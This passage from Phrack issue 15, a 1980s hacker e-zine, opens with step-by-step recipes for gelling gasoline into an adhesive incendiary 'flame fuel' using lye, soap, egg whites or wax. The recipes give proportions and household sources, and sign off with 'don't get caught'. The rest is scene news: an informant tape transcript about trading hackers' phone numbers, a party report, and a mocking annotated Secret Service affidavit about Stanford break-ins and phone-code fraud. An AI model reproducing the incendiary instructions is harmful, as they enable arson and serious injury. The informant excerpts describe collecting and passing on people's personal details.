  811. 2 (flake) or      Lye           Drain cleaner,   Food store or Drug store
  812. 1 (powder)                      making of soap
  813.  
  814. 3                 Ethyl Alcohol Whiskey          Liquor store
  815.                                 Medicine         Drug store
  816.  
  817. NOTE:  Methyl (wood) alcohol or isopropyl (rubbing) alcohol can be substituted
  818.        for ethyl alcohol, but their use produces softer gels.
  819.  
  820. 14                Tallow        Food             Fats rendered by cooking the
  821.                                 Making of soap   meat or suet of animals.
  822.  
  823. NOTE: The following can be substituted for the tallow:
  824.  
  825.         (a) Wool grease (Lanolin) (very good) -- Fat extracted from sheep wool
  826.         (b) Castor Oil (good)
  827.         (c) Any vegetable oil (corn, cottonseed, peanut, linseed, etc.)
  828.         (d) Any fish oil
  829.         (e) Butter or oleo margarine
  830.  
  831. It is necessary when using substitutes (c) to (e) to double the given amount
  832. of fat and of lye for satisfactory body.
  833.  
  834. PROCEDURE
  835. ---------
  836.  
  837. ______________________________________________________________________________
  838. |CAUTION:  Make sure that there are no open flames in the area when mixing   |
  839. |the flame fuel.  NO SMOKING!                                                |
  840. |----------------------------------------------------------------------------|
  841.  
  842. 1. Pour gasoline into jar, bottle or other container. (DO NOT USE AN ALUMINUM
  843.    CONTAINER.)
  844.  
  845. 2. Add tallow (or substitute) to the gasoline and stir for about 1/2 minute to
  846.    dissolve fat.
  847.  
  848. 3. Add alcohol to the gasoline mixture.  Mix thoroughly.
  849.  
  850. 4. In a separate container (NOT ALUMINUM) slowly add lye to an equal volume of
  851.    water.  Mixture should be stirred constantly while adding lye.
  852.  
  853. ______________________________________________________________________________
  854. |CAUTION:  Lye solution can burn skin and destroy clothing.  If any is       |
  855. |spilled, wash away immediately with large quantities of water.              |
  856. |----------------------------------------------------------------------------|
  857.  
  858. 5. Add lye solution to the gasoline mixture and stir occasionally until
  859. thickened (about 1/2 hour)
  860.  
  861. NOTE:  The sample will eventually (1 to 2 days) thicken to a very firm paste.
  862.        This can be thinned, if desired, by stirring in additional gasoline.
  863.  
  864.  
  865.  
  866.  
  867.  
  868.                                    Soap-Alcohol System
  869.  
  870.         Common household soap can be used in combination with alcohol to gel
  871. gasoline for use as a flame fuel which will adhere to target surfaces.
  872.  
  873.  
  874.  
  875.  
  876.  
  877.  
  878. MATERIALS REQUIRED:
  879. ------------------
  880.  
  881. Parts by Volume   Ingredient    How Used         Common Source
  882. ---------------   ----------    --------         -------------
  883.  
  884. 36                Gasoline      Motor Fuel       Gas station or motor vehicle
  885.  
  886. 1                 Ethyl Alcohol Whiskey          Liquor store
  887.                                 Medicine         Drug store
  888.  
  889. NOTE:  Methyl (wood) alcohol or isopropyl (rubbing) alcohol can be substituted
  890.        for ethyl alcohol.
  891.  
  892. 20 (powdered) or  Laundry soap  Washing clothes  Stores
  893. 28 (flake)
  894.  
  895. NOTE:  Unless the word "soap" actually appears somewhere on the container or
  896. wrapper, a washing compound is probably a detergent. THESE CAN NOT BE USED.
  897.  
  898.  
  899. PROCEDURE
  900. ---------
  901.  
  902. ______________________________________________________________________________
  903. |CAUTION:  Make sure that there are no open flames in the area when mixing   |
  904. |the flame fuel.  NO SMOKING!                                                |
  905. |----------------------------------------------------------------------------|
  906.  
  907. 1. If bar soap is used, carve into thin flakes using a knife.
  908.  
  909. 2. Pour Alcohol and gasoline into a jar, bottle or other container and mix
  910.    thoroughly.
  911.  
  912. 3. Add soap powder or flakes to gasoline-alcohol mix and stir occasionally
  913.    until thickened (about 15 minutes).
  914.  
  915.  
  916.  
  917.  
  918.                                    Egg System
  919.  
  920. The white of any bird egg can be used to gel gasoline for use as a flame fuel.
  921.  
  922.  
  923.  
  924.  
  925.  
  926. MATERIALS REQUIRED:
  927. ------------------
  928.  
  929. Parts by Volume   Ingredient    How Used         Common Source
  930. ---------------   ----------    --------         -------------
  931.  
  932. 85                Gasoline      Motor Fuel       Gas station or motor vehicle
  933.  
  934. 14                Egg Whites    Food             Food store, farms
  935.  
  936. Any one of the following
  937.  
  938. 1                 Table Salt    Food, industrial Sea Water, Natural brine,
  939.                                 processes        Food stores
  940.  
  941. 3                 Ground Coffee Food             Food store
  942.  
  943. 3                 Dried Tea     Food             Food store
  944.                   Leaves
  945.  
  946. 3                 Cocoa         Food             Food store
  947.  
  948. 2                 Sugar         Food             Food store
  949.  
  950. 1                 Saltpeter     Pyrotechnics     Drug store
  951.                   (Niter)       Explosives       chemical supply store
  952.                   (Potassium    Matches
  953.                   Nitrate)      Medicine
  954.  
  955. 1                 Epsom salts   Medicine         Drug store, food store
  956.                                 industrial
  957.                                 processes
  958.  
  959. 2                 Washing soda  Washing cleaner  Food store
  960.                   (Sal soda)    Medicine         Drug store
  961.                                 Photography      Photo supply store
  962.  
  963. 1 1/2             Baking soda   Baking           Food store
  964.                                 Manufacturing:   Drug store
  965.                                 Beverages,
  966.                                 Mineral waters,
  967.                                 and Medicine
  968.  
  969. 1 1/2             Aspirin       Medicine         Drug store
  970.                                                  Food store
  971.  
  972.  
  973. PROCEDURE
  974. ---------
  975.  
  976. ______________________________________________________________________________
  977. |CAUTION:  Make sure that there are no open flames in the area when mixing   |
  978. |the flame fuel.  NO SMOKING!                                                |
  979. |----------------------------------------------------------------------------|
  980.  
  981. 1. Separate egg white from yolk.  This can be done by breaking the egg into a
  982.    dish and carefully removing the yolk with a spoon.
  983.  
  984.  
  985. ______________________________________________________________________________
  986. |NOTE:  DO NOT GET THE YELLOW EGG YOLK MIXED INTO THE EGG WHITE.  If egg yolk|
  987. |gets into the egg white, discard the egg.                                   |
  988. |----------------------------------------------------------------------------|
  989.  
  990. 2. Pour egg white into a jar, bottle, or other container and add gasoline.
  991.  
  992. 3. Add the salt (or other additive) to the mixture and stir occasionally until
  993.    gel forms (about 5 to 10 minutes).
  994.  
  995. NOTE:  A thicker flame fuel can be obtained by putting the capped jar in hot
  996.        (65 C) water for about 1/2 hour and then letting them cool to room
  997.        temperature.  (DO NOT HEAT THE GELLED FUEL CONTAINING COFFEE).
  998.  
  999.  
  1000.  
  1001.  
  1002.  
  1003.                                    Wax System
  1004.  
  1005.         Any of several common waxes can be used to gel gasoline for use as a
  1006. flame fuel.
  1007.  
  1008.  
  1009.  
  1010.  
  1011.  
  1012. MATERIALS REQUIRED:
  1013. ------------------
  1014.  
  1015. Parts by Volume   Ingredient    How Used         Common Source
  1016. ---------------   ----------    --------         -------------
  1017.  
  1018. 80                Gasoline      Motor Fuel       Gas station or motor vehicle
  1019.  
  1020. 20                Wax           Leather polish,  Food store, drug store,
  1021.                   (Ozocerite,   sealing wax,     department store
  1022.                   Mineral wax,  candles,
  1023.                   fossil wax,   waxed paper,
  1024.                   ceresin wax   furniture &
  1025.                   beeswax)      floor waxes,
  1026.                                 lithographing.
  1027.  
  1028. PROCEDURE
  1029. ---------
  1030.  
  1031. 1. Melt the wax and pour into jar or bottle which has been placed in a hot
  1032.    water bath.
  1033.  
  1034. 2. Add gasoline to the bottle.
  1035.  
  1036. 3. When wax has completely dissolved in the gasoline, allow the water bath to
  1037.    cool slowly to room temperature.
  1038.  
  1039. NOTE:  If a gel does not form, add additional wax (up to 40% by volume) and
  1040. repeat the above steps.  If no gel forms with 40% wax, make a Lye solution by
  1041. dissolving a small amount of Lye (Sodium Hydroxide) in an equal amount of
  1042. water.  Add this solution (1/2% by volume) to the gasoline wax mix and shake
  1043. bottle until a gel forms.
  1044.  
  1045.  
  1046.  
  1047.  
  1048. Well, that's it, I omitted a few things because they where either redundant,
  1049. or more aimed toward battle field conditions. Be careful, don't get caught,
  1050. and have fun...
  1051.  
  1052.         Elric of Imrryr
  1053.  
  1054.  
  1055.           PWN ^*^ PWN ^*^ PWN {  Final Issue  } PWN ^*^ PWN ^*^ PWN
  1056.           ^*^                                                   ^*^
  1057.           PWN                Phrack World News                  PWN
  1058.           ^*^               Issue XV:  Part One                 ^*^
  1059.           PWN                                                   PWN
  1060.           ^*^          Created, Written, and Edited             ^*^
  1061.           PWN               by Knight Lightning                 PWN
  1062.           ^*^                                                   ^*^
  1063.           PWN ^*^ PWN ^*^ PWN {  Final Issue  } PWN ^*^ PWN ^*^ PWN
  1064.  
  1065. Welcome to my final issue of Phrack World News.  Many people are wondering why
  1066. I am giving it up.  There are several reasons, but the most important is that
  1067. I will be going to college and will have little (if any) time for the
  1068. phreak/hack world or PWN.  I doubt I will even be calling any bulletin boards,
  1069. but I may make an occasional call to a few of my friends in the community.
  1070.  
  1071. The Phrack Inc. VMS is no longer in service and messages will not be received
  1072. there by anyone.  Phrack Inc. is now in the hands of Sir Francis Drake, Elric
  1073. Of Imrryr, and Shooting Shark.
  1074.  
  1075. :Knight Lightning
  1076. ______________________________________________________________________________
  1077.  
  1078. Dan The Operator; Informant                                      July 27, 1986
  1079. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1080. I'm going to assume that all of you have read PWN 14/2 and the details
  1081. surrounding SummerCon '87.
  1082.  
  1083. This article will feature information collected from our investigation and
  1084. quotes from the Noah Tape.
  1085.  
  1086. The tape actually has two parts.  The front side has part of an Alliance
  1087. Teleconference in which Noah attempted to gather information by engineering
  1088. hackers.  Side B contains 45 minutes of a conversation between Noah and John
  1089. Maxfield of BoardScan, in which Noah tried to engineer Maxfield into giving
  1090. him information on certain hackers by trading him information on other
  1091. hackers. All of this has been going on for a long time although we are unsure
  1092. as to how long and Noah was not exactly an informant for Maxfield, it was the
  1093. FBI.
  1094.  
  1095. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1096. Part One:  Noah Engineers his "friends"
  1097.  
  1098. The Alliance teleconference recording has about 7 people on it, but the only
  1099. people I recognized were Dan The Operator, Il Duce (Fiber Optic), Johnny
  1100. Rotten, and The Ninja.
  1101.  
  1102. The topics discussed (mostly by Noah) included;
  1103.  
  1104.    Bill From RNOC / Catch-22 / Doom Prophet / Force Hackers / John Maxfield
  1105.       Karl Marx / Legion of Doom / Lord Rebel / Neba / Phantom Phreaker
  1106.   Phucked Agent 04 / Silver Spy / SummerCon '87 / The Rebel / The Videosmith
  1107.  
  1108.  
  1109. Here is a look at some of the conversation;                     [Il Duce=Mark]
  1110.  
  1111. ------------------------------------------------------------------------------
  1112. Noah:  SILVER SPY, you know him?
  1113. Mark:  Yeah, what about him?
  1114. Noah:  Yeah, Paul.
  1115.  
  1116. [This was done to make it look like Noah knew him and was his buddy.-KL]
  1117. ------------------------------------------------------------------------------
  1118. Noah:  Anyway, is LORD REBEL part of LOD?
  1119. Mark:  He's not really.
  1120. Noah:  I didn't think so.
  1121. Mark:  Well, he is, he is sort of.
  1122. Noah:  Ah, well what does he know.
  1123. Mark:  Not much.
  1124. Noah:  Why do they care about him, he's just a pirate.
  1125.  
  1126. [Look at this dork!  First he tries to act like he knows everything and then
  1127. when he realizes he screwed up, he tries to insult LORD REBEL's abilities.-KL]
  1128. ------------------------------------------------------------------------------
  1129. Noah:  Who else is part of LOD that I missed?
  1130. Mark:  I don't know who you would have heard of.
  1131. Noah:  I've pretty much heard of everyone, I just can't think of anyone else.
  1132.  
  1133. [Yeah Noah, you are a regular best friend with everyone in LOD.-KL]
  1134. ------------------------------------------------------------------------------
  1135. Noah:  Want to give out LORD REBEL's number?
  1136. Mark:  Everybody knows it already.
  1137. Noah:  What is it?
  1138. Mark:  Which one?
  1139. Noah:  Both, all.
  1140. Mark:  Want do you want to know for, don't you have it?
  1141. Noah:  Never bothered getting them.  What do you got? Mark!
  1142. Mark:  Yeah.
  1143. Noah:  Do you have his number?
  1144. Mark:  Yeah.
  1145. Noah:  Well, what is it!?
  1146. Mark:  Why should I say?
  1147. Noah:  I dunno, you say everyone's got it.
  1148. Mark:  Yeah, so.
  1149. Noah:  So if everyone has it, you might as well give it to everybody.
  1150. Mark:  Not really, I wouldn't want to be the one to tell him that I gave out
  1151.        his number.
  1152. Noah:  Ok Mark, fine, it's no problem for me to get anyone's number.  I got
  1153.        VIDEOSMITH's and SILVER SPY's, no problem.  [Yeah right, see the other
  1154.        conversation with John Maxfield.-KL]
  1155. ------------------------------------------------------------------------------
  1156. Noah:  CATCH-22 is supposed to be the most elite BBS in the United States.
  1157.        What do you think about that Mark?
  1158. Mark:  What?
  1159. Noah:  What do you think about that Mark?
  1160. Mark:  About what?
  1161. Noah:  About CATCH-22.
  1162. Mark:  What about it?
  1163. Noah:  (pause) Well.
  1164. Mark:  Its not the greatest board because it's not really that active.
  1165. Noah:  Right, but what do you think about it?  Alright, first off here, first
  1166.        off, first off, do you have KARL MARX's number?
  1167. Mark:  What?
  1168. Noah:  I doubt you have KARL MARX's phone number.
  1169. Mark:  Ask me if I really care.
  1170. Noah:  I'm just wondering if YOU DO.
  1171. Mark:  It's one thing to have all these people's numbers, it's another if you
  1172.        are welcome to call them.
  1173. Noah:  Yeah (pause), well are you?
  1174. Mark:  Why should I say?
  1175. Noah:  I dunno, I dunno.  I'm probably going to ask him anyways.
  1176.  
  1177.        [I don't think my ragging is even necessary in this excerpt.-KL]
  1178. ------------------------------------------------------------------------------
  1179. Noah:  Here is what MAXFIELD says, "You got the hackers, and then you got the
  1180.        people who want to make money off the hackers."  Information shouldn't
  1181.        be free, you should find out things on your own.
  1182.  
  1183.     [Give me a break Noah, you are the BIGGEST leach I have ever seen -KL]
  1184. ------------------------------------------------------------------------------
  1185. One final note to make about the Alliance conversations is that halfway
  1186. through, IL DUCE and DAN THE OPERATOR gave out BILL FROM RNOC's full name,
  1187. phone number, address, etc.
  1188. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1189. Part Two: Noah Engineers John Maxfield
  1190.  
  1191.  The list of topics discussed in this conversation is much longer;
  1192.  
  1193.       Arthur Dent / Ben Casey / Big Brother / Bill From RNOC / BoardScan
  1194. Captain Crunch / Celtic Phrost / Cheshire Catalyst / Doc Holiday / Easywriter
  1195.     Genghis Khan / Jenny Jaguar / Jester Sluggo / Karl Marx / Kerrang Khan
  1196.  Kloey Detect / Max Files / Noah Espert / Legion Of Doom / Legion of Hackers
  1197.    Lord Digital / Lord Rebel / Mark Tabas / Oryan QUEST / Phucked Agent 04
  1198. Phrack Inc. / Pirate's Hangout / Septic Tank / Sigmund Fraud / The Disk Jockey
  1199.        The Executioner / The Federation / The *414* Wizard / The Hobbit
  1200.   The Marauder The Safecracker / The Telecom Security Group / The Videosmith
  1201.        The Weasel / Tommy Hawk / Torture Chamber / Twilight Zone / Tuc
  1202.                           Violet Boregard / Zepplin
  1203.  
  1204.  
  1205. The following are the highlights of the conversation between DAN THE OPERATOR
  1206. and JOHN MAXFIELD.                                      [John Maxfield = John]
  1207. ------------------------------------------------------------------------------
  1208. Noah:  Did you ever find VIDEOSMITH's number?
  1209. John:  No, matter of fact.  You know what it is, I've been on boards he's been
  1210.        on in the 215 NPA [possibly Atlantis], but well.
  1211. Noah:  But you don't have his number?
  1212. John:  Should I?
  1213. Noah:  He's fairly big, he knows his stuff.  I would think he'd be worth
  1214.        getting a number for.
  1215. John:  Doesn't do anything for me because you know, just having his number
  1216.        doesn't get him in trouble or anything.
  1217. Noah:  Oh, well I don't want him to get in trouble...he's a nice person.  So
  1218.        do you have LORD REBEL's phone number?
  1219. John:  What do you know about him?
  1220. Noah:  I think he's up in New York.
  1221. John:  914?
  1222. Noah:  Possibly 718, 212, possibly even 201. [Excuse me you dork.  The 201 NPA
  1223.        is in the state of New Jersey not New York.  What a loser Noah is. -KL]
  1224. John:  If you don't have a number on him I'll have to do an alphabetical
  1225.        search for him.  It takes a while.
  1226. Noah:  Well we could talk while it's going.  I think you're pretty
  1227.        interesting, you're not boring like I am.
  1228. John:  Well you're not boring to me as long as I keep getting people's phone
  1229.        numbers.  Bahahahahahahahahah Har har har.
  1230. Noah:  (Pause)(Pause)(Pause) Bahahahahahahaha.  Sheesh.
  1231. John:  Well let's see what it finds, there's a lot of Lords in there.
  1232. Noah:  He's part of LOD.
  1233. John:  Oh he's part of LOD!?
  1234. Noah:  Yeah.
  1235. John:  Well I might have him and I might not [What a profound statement -KL].
  1236. Noah:  He's not very active in LOD.
  1237.  
  1238.          [The search for LORD REBEL's information was a failure -KL]
  1239. ------------------------------------------------------------------------------
  1240. Noah:  I got a question, I'm still trying to figure this out.  Are there
  1241.        people like me who just call you up like this?
  1242. John:  Yes there are.
  1243. Noah:  A lot?
  1244. John:  Enough.  You know it's funny, there's people that call up and there
  1245.        assholes and I'll just hang up on them.  There is other people that
  1246.        call up and well you know they try to feed me bullshit, but at least
  1247.        they aren't being jerks about it.
  1248. Noah:  You think I'm feeding you bullshit?
  1249. John:  I dunno, maybe you are or maybe you aren't.  What I'm saying is that
  1250.        there are people that behave like humans.  So there are a few that call
  1251.        in.
  1252.  
  1253.        You know when you're working with informants, you got different
  1254.        categories.  You got informants you can trust and you got informants
  1255.        that well hold on a second.  There are some informants, that they could
  1256.        tell me anything and I'd believe them.  Ok, because I know them.  Met
  1257.        them personally maybe or known the guy for 3 or 4 years, his
  1258.        information is always correct that sort of thing.
  1259.  
  1260.        Then there is somebody like you that umm is kinda maybe a "Class 2
  1261.        Informant."  Gives valid phone numbers and information out, but is not
  1262.        really a true informant.  Then there is a "Class 3 Informant" that's
  1263.        like, ahh somebody like ORYAN QUEST who calls up and turns in somebody
  1264.        he doesn't like, but that's all he ever does.  I don't know if you can
  1265.        call them Class 1, Class 2, Class 3 exactly but that's how I look at
  1266.        it.
  1267.  
  1268.    [Shortly after this, Maxfield gave out JESTER SLUGGO's information -KL]
  1269. ------------------------------------------------------------------------------
  1270. Noah:  How about Phucked Agent 04?
  1271. John:  Oh him, his name is XXXXX and he's out in XXXXXXX.
  1272. Noah:  Something like that.
  1273. John:  He's one of the jerks that made death threats against me.  I kinda
  1274.        would like to get him.
  1275. Noah:  You want his number?
  1276. John:  Yeah.
  1277. Noah:  Lemme see if I can catch up with him, I know a few people in LOD.
  1278. ------------------------------------------------------------------------------
  1279. [Noah tried to get information on KERRANG KHAN for a while and then started
  1280. asking about KARL MARX -KL]
  1281.  
  1282. Noah:  Ok, KARL MARX.
  1283. John:  Oh, he got busted along with MARK TABAS you know, I told you all about
  1284.        that.
  1285. Noah:  Yeah yeah.
  1286. John:  He lives out in NPA XXX, but he was going to college in XXXXXXXXXX and
  1287.        I don't have a number for him there.
  1288. Noah:  He's probably back home now.
  1289. John:  Yeah, but I probably shouldn't give out his number.  He did get popped.
  1290. Noah:  Aw come on.
  1291. John:  Nah.
  1292. Noah:  Come on.
  1293. John:  Nah.
  1294. Noah:  Please.
  1295. John:  Nah. I probably don't have a correct number anyway.
  1296. Noah:  Dude.  Well if you don't have a correct number then give me the old
  1297.        number.
  1298. John:  Nah.
  1299. Noah:  C'mon dude.
  1300. John:  Nah.
  1301. Noah:  Dude!
  1302. John:  Nah nah.  Besides I have a feeling that he wouldn't appreciate being
  1303.        called up by hackers anyway.
  1304. Noah:  He's still around though!
  1305. John:  Is he!?
  1306. Noah:  Yes.
  1307. John:  Oh really.
  1308. Noah:  Yes sir.  Because he was talking with THE MARAUDER, you know, Todd.
  1309. John:  Yeah?
  1310. Noah:  Yeah.
  1311. John:  That's interesting.
  1312.  
  1313. [They went on to discuss THE SAFECRAKER, THE SEPTIC TANK, THE TWILIGHT ZONE,
  1314. TORTURE CHAMBER, and THE FEDERATION.  Maxfield reveled that he had been on
  1315. TWILIGHT ZONE back when THE MARAUDER used to run it.  -KL]
  1316. ------------------------------------------------------------------------------
  1317. Noah:  THE MARAUDER is still home, he didn't go to college.
  1318. John:  Yeah, MARAUDER, now he is heavy duty.
  1319. Noah:  Yeah, he knows his snit (not a typo).  However, he doesn't brag about
  1320.        it.
  1321. John:  Well the thing is, you know is what the hell is he trying to
  1322.        accomplish? I sometimes kinda wonder what motivates somebody like that.
  1323. Noah:  What do you mean?
  1324. John:  Well he wants to screw around with all this stuff, but what's the
  1325.        point?
  1326. ------------------------------------------------------------------------------
  1327. SIGMUND FRAUD, MAX FILES, TOMMY HAWK, TUC, PHRACK INC., MARK TABAS, were next
  1328. to be discussed.  After which MAXFIELD went on to retell a story about a
  1329. district attorney in California that referred to him as a legend in his own
  1330. time.  Noah then started asking about CAPTAIN CRUNCH and Easywriter, and
  1331. Maxfield told him the story of CAPTAIN CRUNCH's latest bust.
  1332. ------------------------------------------------------------------------------
  1333. THE DISK JOCKEY, DOC HOLIDAY, THE MARAUDER, BIG BROTHER, ARTHUR DENT, THE
  1334. WEASEL, BILL FROM RNOC, THE 414 WIZARD, THE EXECUTIONER, and LORD DIGITAL were
  1335. next.
  1336.  
  1337. Then it was Noah's turn to unload (although Noah had already given out
  1338. information on many of the previously mentioned people).
  1339.  
  1340. TUC, THE TELECOM SECURITY GROUP, CELTIC PHROST, ZEPPLIN, and GENGHIS KHAN had
  1341. their information handed out freely.
  1342.  
  1343. John:  I guess I'm going to have the goons come over and pay you a visit.
  1344. Noah:  Who me?
  1345. John:  Take your computer, clean your room for you.
  1346. Noah:  No, no, please... don't... you can't do that.  I'll be an informant
  1347.        dammit.  I'll give you all my files, I'll send them immediately...
  1348.        Federal Express.
  1349. John:  Sounds good.
  1350. Noah:  Has anyone ever really done that?
  1351. John:  Well not by Federal Express.
  1352. Noah:  I'll send you all my manuals, everything.  I'll even tell you my
  1353.        favorite Sprint code.
  1354. John:  Sprint would appreciate that.  You know, it's interesting that you know
  1355.        MARAUDER.
  1356. Noah:  Todd and I, yeah, well we're on a first name basis.  [Yeah you know his
  1357.        first name but that's as far as it goes, isn't it Noah. -KL]
  1358. ------------------------------------------------------------------------------
  1359. Noah gave out more people's information and the conversation ran on for
  1360. another 20 minutes.  The problem is that this is when the tape ran out, but
  1361. the conversation was going strong.  Noah was giving out numbers alphabetically
  1362. and he was still in the C-G area when the tape ran out.  There is no telling
  1363. as to what was discussed next.
  1364.  
  1365. All of the people mentioned at the beginning were discussed in depth and the
  1366. excerpts shown here do not necessarily show the extent of the discussion.  I
  1367. didn't transcript the entire conversation because in doing so would publicly
  1368. release information that would be unproductive to our society.
  1369.  
  1370. So, many of you are probably still asking yourself, where did we get the FBI
  1371. connection from?  Well, some time ago, DAN THE OPERATOR used to hang out with
  1372. THE TRADER and they were into some kind of stock fraud using Bank Americard or
  1373. something along those lines.  Something went wrong and Noah was visited by the
  1374. FBI.  As it turns out, Noah became their informant and they dropped the
  1375. charges.
  1376.  
  1377. Sometime later, Noah tried to set up TERMINUS (see the current Phrack
  1378. Pro-Phile) to meet (unknowingly) with the FBI and give them a tour of his
  1379. board,  TERMINUS realized what was going on and Noah's plans were ruined.
  1380.  
  1381. I hope you learned from this story, don't let yourself be maneuvered by people
  1382. like Noah.  There are more informants out there than you think.
  1383.  
  1384.                          Written by Knight Lightning
  1385.  
  1386. For more information about DAN THE OPERATOR, you should read THE SYNDICATE
  1387. REPORTS Transmittal No. 13 by THE SENSEI.  Available on finer BBSes/AEs
  1388. everywhere.
  1389. ______________________________________________________________________________
  1390.  
  1391. PartyCon '87                                                  July 24-26, 1987
  1392. ~~~~~~~~~~~~
  1393. This article is not meant to be as in depth as the SummerCon issue, but I
  1394. think you'll enjoy it.
  1395.  
  1396. Before we begin, here is a list of the total phreak/hack attendees;
  1397.  
  1398.       Cheap Shades / Control C / Forest Ranger / Knight Lightning / Loki
  1399.      Lucifer 666 / Mad Hatter / Sir William / Synthetic Slug / Taran King
  1400.                The Cutthroat / The Disk Jockey / The Mad Hacker
  1401.  
  1402. Other people who attended that should be made a note of include; Dan and Jeff
  1403. (Two of Control C's roommates that were pretty cool), Dennis (The Menace); one
  1404. of Control C's neighbors, Connie; The Mad Hacker's girlfriend (at the time
  1405. anyway), and the United States Secret Service; they weren't actually at
  1406. PartyCon, but they kept a close watch from a distance.
  1407.  
  1408. For me, it started Friday morning when Cheap Shades and I met Forest Ranger
  1409. and Taran King at Taran's house.  Our trip took us through Illinois, and we
  1410. stopped off at a Burger King in Normal, Illinois (close to Illinois State
  1411. University). Would you believe that the majority of the population there had
  1412. no teeth?
  1413.  
  1414. Anyway, our next stop was to see Lucifer 666 in his small one-horse town.  He
  1415. would follow us later (with Synthetic Slug).  We arrived at Control C's
  1416. apartment around 4 PM and found Mad Hatter alone.  The first thing he made a
  1417. note of was some sheets of paper he discovered (while searching ^C's
  1418. apartment).  I won't go into what was on the paper.  Although we didn't know
  1419. it at the time, he copied the papers and hid them in his bag.  It is believed
  1420. that he intended to plant this and other information inside the apartment so
  1421. that ^C would get busted.
  1422.  
  1423. Basically, it was a major party with a few mishaps like Forest Ranger and
  1424. Cheap Shades driving into Grand Rapids, Michigan on Friday night and not
  1425. getting back till 4 AM Saturday.  We hit Lake Shore Drive, the beach, a few
  1426. shopping malls, Chicago's Hard Rock Cafe, and Rush Street.  It was a lot of
  1427. fun and we may do it again sometime soon.
  1428.  
  1429. If you missed PartyCon '87, you missed out.  For those who wanted to go, but
  1430. couldn't find us, we're sorry.  Hotel cancellations and loss of phone lists
  1431. due to current problems made it impossible for us to contact everyone.
  1432.  
  1433.                          Written by Knight Lightning
  1434. ______________________________________________________________________________
  1435.  
  1436.                       #### PHRACK PRESENTS ISSUE 15 ####
  1437.  
  1438.                    ^*^*^*^Phrack World News, Part 1^*^*^*^
  1439.  
  1440.                             **** File 8 of 10 ****
  1441.  
  1442.  
  1443.  
  1444. SEARCH WARRANT ON WRITTEN AFFIDAVIT
  1445.  
  1446. DATE:  7/17/87
  1447.  
  1448. TO:  Special Agent Lewis F. Jackson II, U.S. Secret Service or any agent d use
  1449.      of access devices, and Title 18 USC 1030 - Computer related fraud.
  1450.  
  1451. WHEN:  On or before (10 days) at any time day or night
  1452.  
  1453. ------------
  1454.  
  1455. AFFIDAVIT
  1456.  
  1457.    "I, Lewis F. Jackson II, first being duly sworn, do depose and state:..."
  1458.  
  1459. [Here he goes on and on about his position in the San Jose Secret Service,
  1460. classes he has taken (none of them having to do with computers)]
  1461.  
  1462.    "Other individuals involved in the investigation:
  1463.  
  1464.     Detective J. McMullen -  Stanford Public Safety/Specialist in computers
  1465.     Steve Daugherty       -  Pacific Bell Telephone (sic)/ Specialist in fraud
  1466.     Stephen Hansen        -  Stanford Electrical Eng./ Director
  1467.     Brian Bales           -  Sprint Telecom./ Security Investigator
  1468.     M. Locker             -  ITT Communications/ Security Investigator
  1469.     Jerry Slaughter       -  MCI Communications/Security Investigator
  1470.  
  1471. 4.  On 11/14/86, I met with Detective Sgt. John McMullen, who related the
  1472. following:
  1473.  
  1474.       a.  Beginning on or about 9/1/86, an unknown suspect or group of
  1475. suspects using the code name Pink Floyd repeatedly accessed the Unix and
  1476. Portia computer systems at Stanford University without authorization.
  1477.  
  1478.       b.  The suspects initially managed to decode the password of a computer
  1479. user called "Laurent" and used the account without the permission or knowledge
  1480. of the account holder.  The true account holder was given a new account
  1481. and a program was set up to print out all activity on the "Laurent" account.
  1482.  
  1483.        c & d.  Mentions the systems that were accessed illegally, the most
  1484. 'dangerous' being Arpanet (geeeee).
  1485.  
  1486.        e.  Damage was estimated at $10,000 by Director of Stanford Computers.
  1487.  
  1488.        g.  On 1/13/87, the suspect(s) resumed regular break-ins to the
  1489. "Laurent" account, however traps and traces were initially unsuccessful in
  1490. identifying the suspect(s) because the suspect(s) dialed into the Stanford
  1491. Computer System via Sprint or MCI lines, which did not have immediate trap and
  1492. trace capabilities.
  1493.  
  1494. 6.  On 2/19/87 I forwarded the details of my investigation and a request for
  1495. collateral investigation to the New York Field Office of The U.S. Secret
  1496. Service.  (The USSS [I could say something dumb about USSR here]).  SA Walter
  1497. Burns was assigned the investigation.
  1498.  
  1499. 7.  SA Burns reported telephonically that comparison of the times at which
  1500. Stanford suffered break ins [aahhh, poor Stanford] with that of DNR's on
  1501. suspects in New York, Pennsylvania, Massachusetts, Maryland and California
  1502. showed a correlation.
  1503.  
  1504. 8.  [Some stuff about Oryan QUEST engineering Cosmos numbers].
  1505.  
  1506. 9.  On 4/2/87, I was telephoned again by Mr. Daugherty who reported that on
  1507. 4/1/87, while checking a trouble signal on the above DNR's [on Oryan's lines],
  1508. he overheard a call between the central figure in the New York investigation
  1509. and [Oryan Quest's real name.]  Mr. Daughtery was able to identify and
  1510. distinguish between the three suspects because they addressed each other by
  1511. there first name.  During the conversation,  [Oryan Quest] acknowledged being
  1512. a member of L.O.D. (Legion Of Doom), a very private and exclusive group of
  1513. computer hackers.  [Oryan QUEST never was a member.]
  1514.  
  1515. 10.  [Mr. Daughtery continued to listen while QUEST tried to engineer some
  1516. stuff.  Gee what a coincidence that a security investigator was investigating
  1517. a technical problem at the same time a conversation with 2 of the suspects was
  1518. happening, and perhaps he just COULDN'T disconnect and so had to listen in for
  1519. 20 minutes or so.  What luck.]
  1520.  
  1521. 11.  SA Burns reported that the suspects in New York regularly called the
  1522. suspects in California.
  1523.  
  1524. 14.  From 4/30/87 to 6/15/87 DNR's were on both California suspects and were
  1525. monitored by me.
  1526.  
  1527. [The data from the DNR's was 'analyzed' and sent to Sprint, MCI, and ITT to
  1528. check on codes.  Damages claimed by the various LDX's were:
  1529.  
  1530. SPRINT   :  Oryan QUEST   : 3 codes for losses totaling $4,694.72
  1531.             Mark Of CA    : 2 codes for losses totaling $1,912.57
  1532.  
  1533. ITT      :  Mark Of CA    : 4 codes for losses totaling $639
  1534.  
  1535. MCI      :  Mark Of CA    : 1 code for losses totaling $1,813.62
  1536.  
  1537. And the winner is....Oryan QUEST at $4,694.72 against Mark with $4,365.19.]
  1538.  
  1539. 20.  Through my training and investigation I have learned that people who
  1540. break into computers ("hackers") and people who fraudulently obtain
  1541. telecommunications services ("freakers") are a highly sophisticated and close
  1542. knit group.  They routinely communicate with each other directly or through
  1543. electronic bulletin boards.
  1544.  
